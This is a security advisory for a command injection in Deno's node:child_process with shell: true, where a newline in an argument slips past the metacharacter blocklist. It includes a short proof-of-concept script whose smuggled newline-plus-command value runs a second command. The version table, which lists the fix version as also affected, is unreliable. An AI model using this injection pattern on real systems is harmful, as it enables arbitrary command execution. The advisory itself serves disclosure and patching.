Deno Command Injection Allows Malicious Scripts to Run
Advisory ID: JLSEC-2026-116
CVSS 3.1 score: 8.1
Summary
A Deno update is required to fix a security issue that lets attackers run unauthorized scripts. This affects Deno users who have not updated to version 2.6.8. To stay safe, update Deno to the latest version.
What to do
- Update deno_jll to version 2.6.10+0.
Affected software
| Vendor | Product | Affected versions | Fix available |
|---|---|---|---|
| – | deno_jll | <= 2.6.10+0 | 2.6.10+0 |
Original title
Deno has a Command Injection via Incomplete shell metacharacter blocklist in node:child_process
Original description
## Summary
A command injection vulnerability exists in Deno's `node:child_process` implementation. When a child process is started with `shell: true`, the blocklist of shell metacharacters that is meant to prevent argument values from being interpreted by the shell is incomplete: a newline in an attacker-controlled argument is passed through and is treated by the shell as a command separator, so a second command appended after the newline is executed.
## Reproduction
```javascript
import { spawnSync } from "node:child_process";
import * as fs from "node:fs";
// Cleanup
try { fs.unlinkSync('/tmp/rce_proof'); } catch {}
// Create legitimate script
fs.writeFileSync('/tmp/legitimate.ts', 'console.log("normal");');
// Malicious input with newline injection
const maliciousInput = `/tmp/legitimate.ts\ntouch /tmp/rce_proof`;
// Vulnerable pattern
spawnSync(Deno.execPath(), ['run', '--allow-all', maliciousInput], {
shell: true,
encoding: 'utf-8'
});
// Verify
console.log('Exploit worked:', fs.existsSync('/tmp/rce_proof'));
```
Run: `deno run --allow-all poc.mjs`
The file `/tmp/rce_proof` is created, confirming arbitrary command execution.
## Mitigation
All users need to update to the patched version (Deno v2.6.8).
Source: OSV · CVSS 3.1 score: 8.1
References
- https://github.com/denoland/deno/commit/9132ad958c83a0d0b199de12b69b877f63edab4c
- https://github.com/denoland/deno/releases/tag/v2.6.8
- https://github.com/denoland/deno/security/advisories/GHSA-hmh4-3xvx-q5hr
- https://nvd.nist.gov/vuln/detail/CVE-2026-27190
- https://github.com/advisories/GHSA-hmh4-3xvx-q5hr
Published: 14 Apr 2026 · Updated: 14 Apr 2026 · First seen: 14 Apr 2026